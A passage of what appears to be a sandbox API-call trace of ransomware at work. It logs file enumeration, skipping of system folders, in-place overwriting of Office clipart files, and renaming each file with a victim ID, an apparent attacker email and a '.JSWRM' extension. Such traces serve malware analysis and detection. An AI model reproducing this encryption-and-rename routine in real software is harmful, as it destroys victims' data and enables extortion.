Size=0x10) returned 0x23a258 [0074.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0074.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0074.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0074.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0074.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.305] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0074.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.305] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10c8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04332_.WMF", cAlternateFileName="")) returned 1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2=".") returned 1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="..") returned 1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="...") returned 1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="windows") returned -1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="recovery") returned -1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="perflogs") returned -1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="documents and settings") returned -1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="system volume information") returned -1 [0074.305] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="msocache") returned -1 [0074.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0074.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04332_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04332_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04332_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0074.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04332_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04332_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04332_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.306] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4296) returned 1 [0074.306] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10c0) returned 0x24c1d0 [0074.306] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x10c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x10c0, lpOverlapped=0x0) returned 1 [0074.346] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.346] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x10c0, lpOverlapped=0x0) returned 1 [0074.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.346] CloseHandle (hObject=0x460) returned 1 [0074.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0074.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0074.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0074.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0074.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0074.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.347] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0074.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.348] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc9c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04355_.WMF", cAlternateFileName="")) returned 1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2=".") returned 1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="..") returned 1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="...") returned 1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="windows") returned -1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="recovery") returned -1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="perflogs") returned -1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="documents and settings") returned -1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="system volume information") returned -1 [0074.348] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="msocache") returned -1 [0074.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0074.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04355_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04355_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04355_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0074.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04355_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04355_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04355_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.349] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3228) returned 1 [0074.349] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc90) returned 0x24c1d0 [0074.349] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xc90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xc90, lpOverlapped=0x0) returned 1 [0074.350] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.350] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xc90, lpOverlapped=0x0) returned 1 [0074.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.351] CloseHandle (hObject=0x460) returned 1 [0074.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0074.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0074.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0074.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0074.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0074.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.351] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0074.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.352] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12c8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04369_.WMF", cAlternateFileName="")) returned 1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2=".") returned 1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="..") returned 1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="...") returned 1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="windows") returned -1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="recovery") returned -1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="perflogs") returned -1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="documents and settings") returned -1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="system volume information") returned -1 [0074.352] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="msocache") returned -1 [0074.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04369_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04369_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04369_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04369_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04369_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04369_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.353] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4808) returned 1 [0074.353] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12c0) returned 0x24c1d0 [0074.353] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x12c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x12c0, lpOverlapped=0x0) returned 1 [0074.355] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.355] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x12c0, lpOverlapped=0x0) returned 1 [0074.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.355] CloseHandle (hObject=0x460) returned 1 [0074.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0074.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0074.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0074.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0074.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0074.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.356] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0074.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.356] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, 